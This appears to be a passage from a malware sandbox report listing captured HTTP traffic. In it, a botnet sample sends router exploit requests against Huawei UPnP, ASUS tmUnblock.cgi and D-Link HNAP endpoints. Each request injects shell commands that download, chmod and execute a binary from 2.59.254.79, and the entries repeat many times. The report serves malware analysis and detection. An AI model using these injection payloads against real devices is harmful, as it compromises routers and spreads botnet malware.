6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://2.59.254.79/htmlbins/Vhoats.mips && chmod +x Vhoats.mips;./Vhoats.mips hnap.selfrep`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 